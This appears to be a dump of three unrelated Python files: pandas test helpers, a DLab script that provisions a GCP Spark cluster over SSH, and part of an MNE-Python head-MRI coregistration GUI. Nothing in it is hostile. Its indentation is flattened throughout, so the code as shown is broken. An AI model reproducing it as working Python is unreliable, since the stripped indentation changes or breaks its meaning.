>> a=makeCustomDataframe(5,3,r_idx_nlevels=2,r_ndupe_l=[2])
# DatetimeIndex on row, index with unicode labels on columns
# no names on either axis
>> a=makeCustomDataframe(5,3,c_idx_names=False,r_idx_names=False,
r_idx_type="dt",c_idx_type="u")
    # 4-level multiindex on rows with names provided, 2-level multiindex
# on columns with default labels and default names.
>> a=makeCustomDataframe(5,3,r_idx_nlevels=4,
r_idx_names=["FEE","FIH","FOH","FUM"],
c_idx_nlevels=2)
    >> a=makeCustomDataframe(5,3,r_idx_nlevels=2,c_idx_nlevels=4)
"""
assert c_idx_nlevels > 0
assert r_idx_nlevels > 0
assert r_idx_type is None or (
r_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and r_idx_nlevels == 1
)
assert c_idx_type is None or (
c_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and c_idx_nlevels == 1
)
columns = makeCustomIndex(
ncols,
nlevels=c_idx_nlevels,
prefix="C",
names=c_idx_names,
ndupe_l=c_ndupe_l,
idx_type=c_idx_type,
)
index = makeCustomIndex(
nrows,
nlevels=r_idx_nlevels,
prefix="R",
names=r_idx_names,
ndupe_l=r_ndupe_l,
idx_type=r_idx_type,
)
# by default, generate data based on location
if data_gen_f is None:
data_gen_f = lambda r, c: f"R{r}C{c}"
data = [[data_gen_f(r, c) for c in range(ncols)] for r in range(nrows)]
return DataFrame(data, index, columns, dtype=dtype)
def _create_missing_idx(nrows, ncols, density, random_state=None):
if random_state is None:
random_state = np.random
else:
random_state = np.random.RandomState(random_state)
# below is cribbed from scipy.sparse
size = round((1 - density) * nrows * ncols)
# generate a few more to ensure unique values
min_rows = 5
fac = 1.02
extra_size = min(size + min_rows, fac * size)
def _gen_unique_rand(rng, _extra_size):
ind = rng.rand(int(_extra_size))
return np.unique(np.floor(ind * nrows * ncols))[:size]
ind = _gen_unique_rand(random_state, extra_size)
while ind.size < size:
extra_size *= 1.05
ind = _gen_unique_rand(random_state, extra_size)
j = np.floor(ind * 1.0 / nrows).astype(int)
i = (ind - j * nrows).astype(int)
return i.tolist(), j.tolist()
def makeMissingDataframe(density=0.9, random_state=None):
df = makeDataFrame()
i, j = _create_missing_idx(*df.shape, density=density, random_state=random_state)
df.values[i, j] = np.nan
return df
def test_parallel(num_threads=2, kwargs_list=None):
"""
Decorator to run the same function multiple times in parallel.
Parameters
----------
num_threads : int, optional
The number of times the function is run in parallel.
kwargs_list : list of dicts, optional
The list of kwargs to update original
function kwargs on different threads.
Notes
-----
This decorator does not pass the return value of the decorated function.
Original from scikit-image:
https://github.com/scikit-image/scikit-image/pull/1519
"""
assert num_threads > 0
has_kwargs_list = kwargs_list is not None
if has_kwargs_list:
assert len(kwargs_list) == num_threads
import threading
def wrapper(func):
@wraps(func)
def inner(*args, **kwargs):
if has_kwargs_list:
update_kwargs = lambda i: dict(kwargs, **kwargs_list[i])
else:
update_kwargs = lambda i: kwargs
threads = []
for i in range(num_threads):
updated_kwargs = update_kwargs(i)
thread = threading.Thread(target=func, args=args, kwargs=updated_kwargs)
threads.append(thread)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
return inner
return wrapper
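# Illustrative usage sketch (not part of the original module): test_parallel
# wraps a function so a single call runs it once per thread and joins them all.
# The helper names below (_demo_test_parallel_usage, _record) are hypothetical.
def _demo_test_parallel_usage():
    calls = []
    @test_parallel(num_threads=2)
    def _record():
        calls.append(1)
    _record()      # spawns two threads, starts and joins both
    return calls   # [1, 1] once both threads have appended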
class SubclassedSeries(Series):
_metadata = ["testattr", "name"]
@property
def _constructor(self):
return SubclassedSeries
@property
def _constructor_expanddim(self):
return SubclassedDataFrame
class SubclassedDataFrame(DataFrame):
_metadata = ["testattr"]
@property
def _constructor(self):
return SubclassedDataFrame
@property
def _constructor_sliced(self):
return SubclassedSeries
class SubclassedCategorical(Categorical):
@property
def _constructor(self):
return SubclassedCategorical
def _make_skipna_wrapper(alternative, skipna_alternative=None):
"""
Create a function for calling on an array.
Parameters
----------
alternative : function
The function to be called on the array with no NaNs.
Only used when 'skipna_alternative' is None.
skipna_alternative : function
The function to be called on the original array
Returns
-------
function
"""
if skipna_alternative:
def skipna_wrapper(x):
return skipna_alternative(x.values)
else:
def skipna_wrapper(x):
nona = x.dropna()
if len(nona) == 0:
return np.nan
return alternative(nona)
return skipna_wrapper
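# Illustrative usage sketch (not part of the original module): without a
# skipna_alternative, the wrapper drops NaNs before calling the function.
# The helper name below is hypothetical.
def _demo_skipna_wrapper_usage():
    wrapped_sum = _make_skipna_wrapper(np.sum)
    s = Series([1.0, np.nan, 2.0])
    return wrapped_sum(s)  # 3.0 -- the NaN is removed via dropna()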
def convert_rows_list_to_csv_str(rows_list: list[str]):
"""
Convert list of CSV rows to single CSV-formatted string for current OS.
This method is used for creating expected value of to_csv() method.
Parameters
----------
rows_list : List[str]
Each element represents the row of csv.
Returns
-------
str
Expected output of to_csv() in current OS.
"""
sep = os.linesep
return sep.join(rows_list) + sep
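# Illustrative usage sketch (not part of the original module): the expected
# to_csv() text is simply the rows joined with the platform line separator.
# The helper name below is hypothetical.
def _demo_convert_rows_usage():
    rows = ["a,b", "1,2"]
    expected = convert_rows_list_to_csv_str(rows)
    # "a,b\n1,2\n" on POSIX; the separator is "\r\n" on Windows.
    return expected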
def external_error_raised(expected_exception: type[Exception]) -> ContextManager:
"""
Helper function to mark pytest.raises that have an external error message.
Parameters
----------
expected_exception : Exception
Expected error to raise.
Returns
-------
Callable
Regular `pytest.raises` function with `match` equal to `None`.
"""
import pytest
return pytest.raises(expected_exception, match=None) # noqa: PDF010
cython_table = pd.core.common._cython_table.items()
def get_cython_table_params(ndframe, func_names_and_expected):
"""
Combine frame, functions from com._cython_table
keys and expected result.
Parameters
----------
ndframe : DataFrame or Series
func_names_and_expected : Sequence of two items
The first item is a name of a NDFrame method ('sum', 'prod') etc.
The second item is the expected return value.
Returns
-------
list
List of three items (DataFrame, function, expected result)
"""
results = []
for func_name, expected in func_names_and_expected:
results.append((ndframe, func_name, expected))
results += [
(ndframe, func, expected)
for func, name in cython_table
if name == func_name
]
return results
def get_op_from_name(op_name: str) -> Callable:
"""
The operator function for a given op name.
Parameters
----------
op_name : str
The op name, in form of "add" or "__add__".
Returns
-------
function
A function performing the operation.
"""
short_opname = op_name.strip("_")
try:
op = getattr(operator, short_opname)
except AttributeError:
# Assume it is the reverse operator
rop = getattr(operator, short_opname[1:])
op = lambda x, y: rop(y, x)
return op
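# Illustrative usage sketch (not part of the original module): reverse ops such
# as "__radd__" have no operator counterpart, so the helper swaps the operands.
# The helper name below is hypothetical.
def _demo_get_op_from_name_usage():
    add = get_op_from_name("__add__")     # operator.add
    radd = get_op_from_name("__radd__")   # lambda x, y: operator.add(y, x)
    return add(1, 2), radd(1, 2)          # (3, 3)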
# -----------------------------------------------------------------------------
# Indexing test helpers
def getitem(x):
return x
def setitem(x):
return x
def loc(x):
return x.loc
def iloc(x):
return x.iloc
def at(x):
return x.at
def iat(x):
return x.iat
|
dataengine_configure.py
|
#!/usr/bin/python
# *****************************************************************************
#
# Copyright (c) 2016, EPAM SYSTEMS INC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ******************************************************************************
import json
import time
from fabric.api import *
from dlab.fab import *
from dlab.meta_lib import *
from dlab.actions_lib import *
import sys
import traceback
import os
import uuid
import logging
from Crypto.PublicKey import RSA
import multiprocessing
def configure_slave(slave_number, data_engine):
slave_name = data_engine['slave_node_name'] + '{}'.format(slave_number + 1)
slave_hostname = GCPMeta().get_private_ip_address(slave_name)
try:
logging.info('[CREATING DLAB SSH USER ON SLAVE NODE]')
print('[CREATING DLAB SSH USER ON SLAVE NODE]')
params = "--hostname {} --keyfile {} --initial_user {} --os_user {} --sudo_group {}".format \
(slave_hostname, os.environ['conf_key_dir'] + data_engine['key_name'] + ".pem", initial_user,
data_engine['dlab_ssh_user'], sudo_group)
try:
local("~/scripts/{}.py {}".format('create_ssh_user', params))
except:
traceback.print_exc()
raise Exception
except Exception as err:
for i in range(data_engine['instance_count'] - 1):
slave_name = data_engine['slave_node_name'] + '{}'.format(i+1)
GCPActions().remove_instance(slave_name, data_engine['zone'])
GCPActions().remove_instance(data_engine['master_node_name'], data_engine['zone'])
append_result("Failed to create ssh user on slave.", str(err))
sys.exit(1)
try:
print('[INSTALLING USERs KEY ON SLAVE NODE]')
logging.info('[INSTALLING USERs KEY ON SLAVE NODE]')
additional_config = {"user_keyname": os.environ['edge_user_name'],
"user_keydir": os.environ['conf_key_dir']}
params = "--hostname {} --keyfile {} --additional_config '{}' --user {}".format(
slave_hostname, os.environ['conf_key_dir'] + data_engine['key_name'] + ".pem", json.dumps(additional_config), data_engine['dlab_ssh_user'])
try:
local("~/scripts/{}.py {}".format('install_user_key', params))
except:
append_result("Failed installing users key")
raise Exception
except Exception as err:
for i in range(data_engine['instance_count'] - 1):
slave_name = data_engine['slave_node_name'] + '{}'.format(i+1)
GCPActions().remove_instance(slave_name, data_engine['zone'])
GCPActions().remove_instance(data_engine['master_node_name'], data_engine['zone'])
append_result("Failed to install ssh user key on slave.", str(err))
sys.exit(1)
try:
logging.info('[CONFIGURE PROXY ON SLAVE NODE]')
        print('[CONFIGURE PROXY ON SLAVE NODE]')
additional_config = {"proxy_host": edge_instance_name, "proxy_port": "3128"}
params = "--hostname {} --instance_name {} --keyfile {} --additional_config '{}' --os_user {}"\
.format(slave_hostname, slave_name, keyfile_name, json.dumps(additional_config),
data_engine['dlab_ssh_user'])
try:
local("~/scripts/{}.py {}".format('common_configure_proxy', params))
except:
traceback.print_exc()
raise Exception
except Exception as err:
for i in range(data_engine['instance_count'] - 1):
slave_name = data_engine['slave_node_name'] + '{}'.format(i+1)
GCPActions().remove_instance(slave_name, data_engine['zone'])
GCPActions().remove_instance(data_engine['master_node_name'], data_engine['zone'])
append_result("Failed to configure proxy on slave.", str(err))
sys.exit(1)
try:
logging.info('[INSTALLING PREREQUISITES ON SLAVE NODE]')
print('[INSTALLING PREREQUISITES ON SLAVE NODE]')
params = "--hostname {} --keyfile {} --user {} --region {}". \
format(slave_hostname, keyfile_name, data_engine['dlab_ssh_user'], data_engine['region'])
try:
local("~/scripts/{}.py {}".format('install_prerequisites', params))
except:
traceback.print_exc()
raise Exception
except Exception as err:
append_result("Failed installing apps: apt & pip.", str(err))
for i in range(data_engine['instance_count'] - 1):
slave_name = data_engine['slave_node_name'] + '{}'.format(i+1)
GCPActions().remove_instance(slave_name, data_engine['zone'])
GCPActions().remove_instance(data_engine['master_node_name'], data_engine['zone'])
append_result("Failed to install prerequisites on slave.", str(err))
sys.exit(1)
try:
        logging.info('[CONFIGURE SLAVE NODE {}]'.format(slave_number + 1))
        print('[CONFIGURE SLAVE NODE {}]'.format(slave_number + 1))
params = "--hostname {} --keyfile {} --region {} --spark_version {} --hadoop_version {} --os_user {} --scala_version {} --r_mirror {} --master_ip {} --node_type {}". \
format(slave_hostname, keyfile_name, data_engine['region'], os.environ['notebook_spark_version'],
os.environ['notebook_hadoop_version'], data_engine['dlab_ssh_user'],
os.environ['notebook_scala_version'], os.environ['notebook_r_mirror'], master_node_hostname,
'slave')
try:
local("~/scripts/{}.py {}".format('configure_dataengine', params))
except:
traceback.print_exc()
raise Exception
except Exception as err:
append_result("Failed configuring slave node", str(err))
for i in range(data_engine['instance_count'] - 1):
slave_name = data_engine['slave_node_name'] + '{}'.format(i+1)
GCPActions().remove_instance(slave_name, data_engine['zone'])
GCPActions().remove_instance(data_engine['master_node_name'], data_engine['zone'])
append_result("Failed to configure slave node.", str(err))
sys.exit(1)
if __name__ == "__main__":
local_log_filename = "{}_{}_{}.log".format(os.environ['conf_resource'], os.environ['edge_user_name'],
os.environ['request_id'])
local_log_filepath = "/logs/" + os.environ['conf_resource'] + "/" + local_log_filename
logging.basicConfig(format='%(levelname)-8s [%(asctime)s] %(message)s',
level=logging.INFO,
filename=local_log_filepath)
try:
print('Generating infrastructure names and tags')
data_engine = dict()
data_engine['service_base_name'] = (os.environ['conf_service_base_name']).lower().replace('_', '-')
data_engine['edge_user_name'] = (os.environ['edge_user_name']).lower().replace('_', '-')
data_engine['region'] = os.environ['gcp_region']
data_engine['zone'] = os.environ['gcp_zone']
try:
if os.environ['gcp_vpc_name'] == '':
raise KeyError
else:
data_engine['vpc_name'] = os.environ['gcp_vpc_name']
except KeyError:
data_engine['vpc_name'] = '{}-ssn-vpc'.format(data_engine['service_base_name'])
try:
data_engine['exploratory_name'] = (os.environ['exploratory_name']).lower().replace('_', '-')
except:
data_engine['exploratory_name'] = ''
try:
data_engine['computational_name'] = os.environ['computational_name'].lower().replace('_', '-')
except:
data_engine['computational_name'] = ''
data_engine['subnet_name'] = '{0}-{1}-subnet'.format(data_engine['service_base_name'],
data_engine['edge_user_name'])
data_engine['master_size'] = os.environ['gcp_dataengine_master_size']
data_engine['slave_size'] = os.environ['gcp_dataengine_slave_size']
data_engine['key_name'] = os.environ['conf_key_name']
data_engine['ssh_key_path'] = '{0}{1}.pem'.format(os.environ['conf_key_dir'], data_engine['key_name'])
data_engine['dataengine_service_account_name'] = '{}-{}-ps'.format(data_engine['service_base_name'],
data_engine['edge_user_name'])
if os.environ['conf_os_family'] == 'debian':
initial_user = 'ubuntu'
sudo_group = 'sudo'
if os.environ['conf_os_family'] == 'redhat':
initial_user = 'ec2-user'
sudo_group = 'wheel'
data_engine['cluster_name'] = data_engine['service_base_name'] + '-' + data_engine['edge_user_name'] + \
'-de-' + data_engine['exploratory_name'] + '-' + \
data_engine['computational_name']
data_engine['master_node_name'] = data_engine['cluster_name'] + '-m'
data_engine['slave_node_name'] = data_engine['cluster_name'] + '-s'
data_engine['instance_count'] = int(os.environ['dataengine_instance_count'])
data_engine['notebook_name'] = os.environ['notebook_instance_name']
data_engine['gpu_accelerator_type'] = 'None'
if os.environ['application'] in ('tensor', 'deeplearning'):
data_engine['gpu_accelerator_type'] = os.environ['gcp_gpu_accelerator_type']
data_engine['network_tag'] = '{0}-{1}-ps'.format(data_engine['service_base_name'],
data_engine['edge_user_name'])
master_node_hostname = GCPMeta().get_private_ip_address(data_engine['master_node_name'])
edge_instance_name = '{0}-{1}-edge'.format(data_engine['service_base_name'],
data_engine['edge_user_name'])
data_engine['dlab_ssh_user'] = os.environ['conf_os_user']
keyfile_name = "{}{}.pem".format(os.environ['conf_key_dir'], os.environ['conf_key_name'])
except Exception as err:
for i in range(data_engine['instance_count'] - 1):
slave_name = data_engine['slave_node_name'] + '{}'.format(i+1)
GCPActions().remove_instance(slave_name, data_engine['zone'])
GCPActions().remove_instance(data_engine['master_node_name'], data_engine['zone'])
print("Failed to generate variables dictionary.")
append_result("Failed to generate variables dictionary.", str(err))
sys.exit(1)
try:
logging.info('[CREATING DLAB SSH USER ON MASTER NODE]')
print('[CREATING DLAB SSH USER ON MASTER NODE]')
params = "--hostname {} --keyfile {} --initial_user {} --os_user {} --sudo_group {}".format\
(master_node_hostname, os.environ['conf_key_dir'] + data_engine['key_name'] + ".pem", initial_user,
data_engine['dlab_ssh_user'], sudo_group)
try:
local("~/scripts/{}.py {}".format('create_ssh_user', params))
except:
traceback.print_exc()
raise Exception
except Exception as err:
for i in range(data_engine['instance_count'] - 1):
slave_name = data_engine['slave_node_name'] + '{}'.format(i+1)
GCPActions().remove_instance(slave_name, data_engine['zone'])
GCPActions().remove_instance(data_engine['master_node_name'], data_engine['zone'])
append_result("Failed to create ssh user on master.", str(err))
sys.exit(1)
try:
print('[INSTALLING USERs KEY ON MASTER NODE]')
logging.info('[INSTALLING USERs KEY ON MASTER NODE]')
additional_config = {"user_keyname": os.environ['edge_user_name'],
"user_keydir": os.environ['conf_key_dir']}
params = "--hostname {} --keyfile {} --additional_config '{}' --user {}".format(
master_node_hostname, os.environ['conf_key_dir'] + data_engine['key_name'] + ".pem", json.dumps(additional_config), data_engine['dlab_ssh_user'])
try:
local("~/scripts/{}.py {}".format('install_user_key', params))
except:
append_result("Failed installing users key")
raise Exception
except Exception as err:
for i in range(data_engine['instance_count'] - 1):
slave_name = data_engine['slave_node_name'] + '{}'.format(i+1)
GCPActions().remove_instance(slave_name, data_engine['zone'])
GCPActions().remove_instance(data_engine['master_node_name'], data_engine['zone'])
append_result("Failed to install ssh user on master.", str(err))
sys.exit(1)
try:
logging.info('[CONFIGURE PROXY ON MASTER NODE]')
        print('[CONFIGURE PROXY ON MASTER NODE]')
additional_config = {"proxy_host": edge_instance_name, "proxy_port": "3128"}
params = "--hostname {} --instance_name {} --keyfile {} --additional_config '{}' --os_user {}"\
.format(master_node_hostname, data_engine['master_node_name'], keyfile_name, json.dumps(additional_config),
data_engine['dlab_ssh_user'])
try:
local("~/scripts/{}.py {}".format('common_configure_proxy', params))
except:
traceback.print_exc()
raise Exception
except Exception as err:
for i in range(data_engine['instance_count'] - 1):
slave_name = data_engine['slave_node_name'] + '{}'.format(i+1)
GCPActions().remove_instance(slave_name, data_engine['zone'])
GCPActions().remove_instance(data_engine['master_node_name'], data_engine['zone'])
append_result("Failed to configure proxy on master.", str(err))
sys.exit(1)
try:
logging.info('[INSTALLING PREREQUISITES ON MASTER NODE]')
print('[INSTALLING PREREQUISITES ON MASTER NODE]')
params = "--hostname {} --keyfile {} --user {} --region {}".\
format(master_node_hostname, keyfile_name, data_engine['dlab_ssh_user'], data_engine['region'])
try:
local("~/scripts/{}.py {}".format('install_prerequisites', params))
except:
traceback.print_exc()
raise Exception
except Exception as err:
append_result("Failed installing apps: apt & pip.", str(err))
for i in range(data_engine['instance_count'] - 1):
slave_name = data_engine['slave_node_name'] + '{}'.format(i+1)
GCPActions().remove_instance(slave_name, data_engine['zone'])
GCPActions().remove_instance(data_engine['master_node_name'], data_engine['zone'])
append_result("Failed to install prerequisites on master.", str(err))
sys.exit(1)
try:
logging.info('[CONFIGURE MASTER NODE]')
print('[CONFIGURE MASTER NODE]')
params = "--hostname {} --keyfile {} --region {} --spark_version {} --hadoop_version {} --os_user {} --scala_version {} --r_mirror {} --master_ip {} --node_type {}".\
format(master_node_hostname, keyfile_name, data_engine['region'], os.environ['notebook_spark_version'],
os.environ['notebook_hadoop_version'], data_engine['dlab_ssh_user'],
os.environ['notebook_scala_version'], os.environ['notebook_r_mirror'], master_node_hostname,
'master')
try:
local("~/scripts/{}.py {}".format('configure_dataengine', params))
except:
traceback.print_exc()
raise Exception
except Exception as err:
append_result("Failed to configure master node", str(err))
for i in range(data_engine['instance_count'] - 1):
slave_name = data_engine['slave_node_name'] + '{}'.format(i+1)
GCPActions().remove_instance(slave_name, data_engine['zone'])
GCPActions().remove_instance(data_engine['master_node_name'], data_engine['zone'])
sys.exit(1)
try:
jobs = []
for slave in range(data_engine['instance_count'] - 1):
p = multiprocessing.Process(target=configure_slave, args=(slave, data_engine))
jobs.append(p)
p.start()
for job in jobs:
job.join()
for job in jobs:
if job.exitcode != 0:
raise Exception
except Exception as err:
for i in range(data_engine['instance_count'] - 1):
slave_name = data_engine['slave_node_name'] + '{}'.format(i+1)
GCPActions().remove_instance(slave_name, data_engine['zone'])
GCPActions().remove_instance(data_engine['master_node_name'], data_engine['zone'])
sys.exit(1)
try:
logging.info('[SUMMARY]')
print('[SUMMARY]')
print("Service base name: {}".format(data_engine['service_base_name']))
print("Region: {}".format(data_engine['region']))
print("Cluster name: {}".format(data_engine['cluster_name']))
print("Master node shape: {}".format(data_engine['master_size']))
print("Slave node shape: {}".format(data_engine['slave_size']))
print("Instance count: {}".format(str(data_engine['instance_count'])))
with open("/root/result.json", 'w') as result:
res = {"hostname": data_engine['cluster_name'],
"instance_id": data_engine['master_node_name'],
"key_name": data_engine['key_name'],
"Action": "Create new Data Engine"}
print(json.dumps(res))
result.write(json.dumps(res))
except:
print("Failed writing results.")
sys.exit(0)
|
_coreg_gui.py
|
"""Traits-based GUI for head-MRI coregistration"""
# Authors: Christian Brodbeck <christianbrodbeck@nyu.edu>
#
# License: BSD (3-clause)
from copy import deepcopy
import os
from ..externals.six.moves import queue
import re
from threading import Thread
import numpy as np
from scipy.spatial.distance import cdist
# allow import without traits
try:
from mayavi.core.ui.mayavi_scene import MayaviScene
from mayavi.tools.mlab_scene_model import MlabSceneModel
from pyface.api import (error, confirm, warning, OK, YES, information,
FileDialog, GUI)
from traits.api import (Bool, Button, cached_property, DelegatesTo,
Directory, Enum, Float, HasTraits,
HasPrivateTraits, Instance, Int, on_trait_change,
Property, Str)
from traitsui.api import (View, Item, Group, HGroup, VGroup, VGrid,
EnumEditor, Handler, Label, TextEditor)
from traitsui.menu import Action, UndoButton, CancelButton, NoButtons
from tvtk.pyface.scene_editor import SceneEditor
except:
from ..utils import trait_wraith
HasTraits = object
HasPrivateTraits = object
Handler = object
cached_property = trait_wraith
on_trait_change = trait_wraith
MayaviScene = trait_wraith
MlabSceneModel = trait_wraith
Bool = trait_wraith
Button = trait_wraith
DelegatesTo = trait_wraith
Directory = trait_wraith
Enum = trait_wraith
Float = trait_wraith
Instance = trait_wraith
Int = trait_wraith
Property = trait_wraith
Str = trait_wraith
View = trait_wraith
Item = trait_wraith
Group = trait_wraith
HGroup = trait_wraith
VGroup = trait_wraith
VGrid = trait_wraith
EnumEditor = trait_wraith
Label = trait_wraith
TextEditor = trait_wraith
Action = trait_wraith
UndoButton = trait_wraith
CancelButton = trait_wraith
NoButtons = trait_wraith
SceneEditor = trait_wraith
from ..coreg import bem_fname, trans_fname
from ..fiff import FIFF
from ..forward import prepare_bem_model
from ..transforms import (write_trans, read_trans, apply_trans, rotation,
translation, scaling, rotation_angles)
from ..coreg import (fit_matched_points, fit_point_cloud, scale_mri,
_point_cloud_error)
from ..utils import get_subjects_dir, logger
from ._fiducials_gui import MRIHeadWithFiducialsModel, FiducialsPanel
from ._file_traits import (assert_env_set, trans_wildcard, RawSource,
SubjectSelectorPanel)
from ._viewer import defaults, HeadViewController, PointObject, SurfaceObject
laggy_float_editor = TextEditor(auto_set=False, enter_set=True, evaluate=float)
class CoregModel(HasPrivateTraits):
"""Traits object for estimating the head mri transform.
Notes
-----
Transform from head to mri space is modeled with the following steps:
* move the head shape to its nasion position
* rotate the head shape with user defined rotation around its nasion
* move the head shape by user defined translation
* move the head shape origin to the mri nasion
If MRI scaling is enabled,
* the MRI is scaled relative to its origin center (prior to any
transformation of the digitizer head)
Don't sync transforms to anything to prevent them from being recomputed
upon every parameter change.
"""
# data sources
mri = Instance(MRIHeadWithFiducialsModel, ())
hsp = Instance(RawSource, ())
# parameters
n_scale_params = Enum(0, 1, 3, desc="Scale the MRI to better fit the "
"subject's head shape (a new MRI subject will be "
"created with a name specified upon saving)")
scale_x = Float(1, label="Right (X)")
scale_y = Float(1, label="Anterior (Y)")
scale_z = Float(1, label="Superior (Z)")
rot_x = Float(0, label="Right (X)")
rot_y = Float(0, label="Anterior (Y)")
rot_z = Float(0, label="Superior (Z)")
trans_x = Float(0, label="Right (X)")
trans_y = Float(0, label="Anterior (Y)")
trans_z = Float(0, label="Superior (Z)")
# secondary to parameters
scale = Property(depends_on=['n_scale_params', 'scale_x', 'scale_y',
'scale_z'])
has_fid_data = Property(Bool, depends_on=['mri_origin', 'hsp.nasion'],
desc="Required fiducials data is present.")
has_pts_data = Property(Bool, depends_on=['mri.points', 'hsp.points'])
# MRI dependent
mri_origin = Property(depends_on=['mri.nasion', 'scale'],
desc="Coordinates of the scaled MRI's nasion.")
# target transforms
mri_scale_trans = Property(depends_on=['scale'])
head_mri_trans = Property(depends_on=['hsp.nasion', 'rot_x', 'rot_y',
'rot_z', 'trans_x', 'trans_y',
'trans_z', 'mri_origin'],
desc="Transformaiton of the head shape to "
"match the scaled MRI.")
# info
can_save = Property(Bool, depends_on=['head_mri_trans'])
raw_subject = Property(depends_on='hsp.raw_fname', desc="Subject guess "
"based on the raw file name.")
lock_fiducials = DelegatesTo('mri')
# transformed geometry
transformed_mri_points = Property(depends_on=['mri.points',
'mri_scale_trans'])
transformed_hsp_points = Property(depends_on=['hsp.points',
'head_mri_trans'])
transformed_mri_lpa = Property(depends_on=['mri.lpa', 'mri_scale_trans'])
transformed_hsp_lpa = Property(depends_on=['hsp.lpa', 'head_mri_trans'])
transformed_mri_nasion = Property(depends_on=['mri.nasion',
'mri_scale_trans'])
transformed_hsp_nasion = Property(depends_on=['hsp.nasion',
'head_mri_trans'])
transformed_mri_rpa = Property(depends_on=['mri.rpa', 'mri_scale_trans'])
transformed_hsp_rpa = Property(depends_on=['hsp.rpa', 'head_mri_trans'])
# fit properties
lpa_distance = Property(depends_on=['transformed_mri_lpa',
'transformed_hsp_lpa'])
nasion_distance = Property(depends_on=['transformed_mri_nasion',
'transformed_hsp_nasion'])
rpa_distance = Property(depends_on=['transformed_mri_rpa',
'transformed_hsp_rpa'])
point_distance = Property(depends_on=['transformed_mri_points',
'transformed_hsp_points'])
# fit property info strings
fid_eval_str = Property(depends_on=['lpa_distance', 'nasion_distance',
'rpa_distance'])
points_eval_str = Property(depends_on='point_distance')
@cached_property
def _get_can_save(self):
return np.any(self.head_mri_trans != np.eye(4))
@cached_property
def _get_has_pts_data(self):
has = (np.any(self.mri.points) and np.any(self.hsp.points))
return has
@cached_property
def _get_has_fid_data(self):
has = (np.any(self.mri_origin) and np.any(self.hsp.nasion))
return has
@cached_property
def _get_scale(self):
if self.n_scale_params == 0:
return np.array(1)
elif self.n_scale_params == 1:
return np.array(self.scale_x)
else:
return np.array([self.scale_x, self.scale_y, self.scale_z])
@cached_property
def _get_mri_scale_trans(self):
if np.isscalar(self.scale) or self.scale.ndim == 0:
if self.scale == 1:
return np.eye(4)
else:
s = self.scale
return scaling(s, s, s)
else:
return scaling(*self.scale)
@cached_property
def _get_mri_origin(self):
if np.isscalar(self.scale) and self.scale == 1:
return self.mri.nasion
else:
return self.mri.nasion * self.scale
@cached_property
def _get_head_mri_trans(self):
if not self.has_fid_data:
return np.eye(4)
# move hsp so that its nasion becomes the origin
x, y, z = -self.hsp.nasion[0]
trans = translation(x, y, z)
# rotate hsp by rotation parameters
rot = rotation(self.rot_x, self.rot_y, self.rot_z)
trans = np.dot(rot, trans)
# move hsp by translation parameters
transl = translation(self.trans_x, self.trans_y, self.trans_z)
trans = np.dot(transl, trans)
# move the hsp origin(/nasion) to the MRI's nasion
x, y, z = self.mri_origin[0]
tgt_mri_trans = translation(x, y, z)
trans = np.dot(tgt_mri_trans, trans)
return trans
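    # Worked sketch of the composition above (added comment, not in the
    # original source): writing T(v) for a translation by v, R for the
    # rotation and T_par for the user translation, the matrix built here is
    #     head_mri_trans = T(mri_origin) @ T_par @ R @ T(-hsp.nasion)
    # i.e. the head shape is first centred on its own nasion, then rotated,
    # then shifted by the user parameters, and finally moved onto the
    # (scaled) MRI nasion.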
@cached_property
def _get_transformed_mri_points(self):
return apply_trans(self.mri_scale_trans, self.mri.points)
@cached_property
def _get_transformed_mri_lpa(self):
return apply_trans(self.mri_scale_trans, self.mri.lpa)
@cached_property
def _get_transformed_mri_nasion(self):
return apply_trans(self.mri_scale_trans, self.mri.nasion)
@cached_property
def _get_transformed_mri_rpa(self):
return apply_trans(self.mri_scale_trans, self.mri.rpa)
@cached_property
def _get_transformed_hsp_points(self):
return apply_trans(self.head_mri_trans, self.hsp.points)
@cached_property
def _get_transformed_hsp_lpa(self):
return apply_trans(self.head_mri_trans, self.hsp.lpa)
@cached_property
def _get_transformed_hsp_nasion(self):
return apply_trans(self.head_mri_trans, self.hsp.nasion)
@cached_property
def _get_transformed_hsp_rpa(self):
return apply_trans(self.head_mri_trans, self.hsp.rpa)
@cached_property
def _get_lpa_distance(self):
d = np.ravel(self.transformed_mri_lpa - self.transformed_hsp_lpa)
return np.sqrt(np.dot(d, d))
@cached_property
def _get_nasion_distance(self):
d = np.ravel(self.transformed_mri_nasion - self.transformed_hsp_nasion)
return np.sqrt(np.dot(d, d))
@cached_property
def _get_rpa_distance(self):
d = np.ravel(self.transformed_mri_rpa - self.transformed_hsp_rpa)
return np.sqrt(np.dot(d, d))
@cached_property
def _get_point_distance(self):
if (len(self.transformed_hsp_points) == 0
or len(self.transformed_mri_points) == 0):
return
dists = cdist(self.transformed_hsp_points, self.transformed_mri_points,
'euclidean')
dists = np.min(dists, 1)
return dists
@cached_property
def _get_fid_eval_str(self):
d = (self.lpa_distance * 1000, self.nasion_distance * 1000,
self.rpa_distance * 1000)
txt = ("Fiducials Error: LPA %.1f mm, NAS %.1f mm, RPA %.1f mm" % d)
return txt
@cached_property
def _get_points_eval_str(self):
if self.point_distance is None:
return ""
av_dist = np.mean(self.point_distance)
return "Average Points Error: %.1f mm" % (av_dist * 1000)
def _get_raw_subject(self):
# subject name guessed based on the raw file name
if '_' in self.hsp.raw_fname:
subject, _ = self.hsp.raw_fname.split('_', 1)
if not subject:
subject = None
else:
subject = None
return subject
@on_trait_change('raw_subject')
def _on_raw_subject_change(self, subject):
if subject in self.mri.subject_source.subjects:
self.mri.subject = subject
elif 'fsaverage' in self.mri.subject_source.subjects:
self.mri.subject = 'fsaverage'
def omit_hsp_points(self, distance=0, reset=False):
"""Exclude head shape points that are far away from the MRI head
Parameters
----------
distance : float
Exclude all points that are further away from the MRI head than
this distance. Previously excluded points are still excluded unless
reset=True is specified. A value of distance <= 0 excludes nothing.
reset : bool
Reset the filter before calculating new omission (default is
False).
"""
distance = float(distance)
if reset:
logger.info("Coregistration: Reset excluded head shape points")
self.hsp.points_filter = None
if distance <= 0:
return
# find the new filter
hsp_pts = self.transformed_hsp_points
